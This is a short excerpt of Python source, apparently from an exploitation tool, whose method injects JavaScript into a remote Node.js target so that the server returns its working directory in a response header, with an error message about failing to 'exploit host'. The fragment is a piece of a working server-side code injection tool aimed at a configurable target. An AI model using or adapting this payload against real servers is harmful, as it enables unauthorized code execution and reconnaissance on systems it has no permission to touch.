(self)
| 23 | @brief See base class for details. |
| 24 | """ |
| 25 | def _Base__make_connection(self): |
| 26 | try: |
| 27 | return self._Base__send_message( |
| 28 | f"r.setHeader('{self.header}', process.cwd());" |
| 29 | f"r.end();") |
| 30 | except: |
| 31 | raise CommandException(f"Unable to exploit host. Make sure the " |
| 32 | f"TARGET_HOST, TARGET_PATH, TARGET_TYPE, " |
| 33 | f"and METHOD are correct.") |
| 34 | |
| 35 | """ |
| 36 | @brief See base class for details. |
nothing calls this directly
no test coverage detected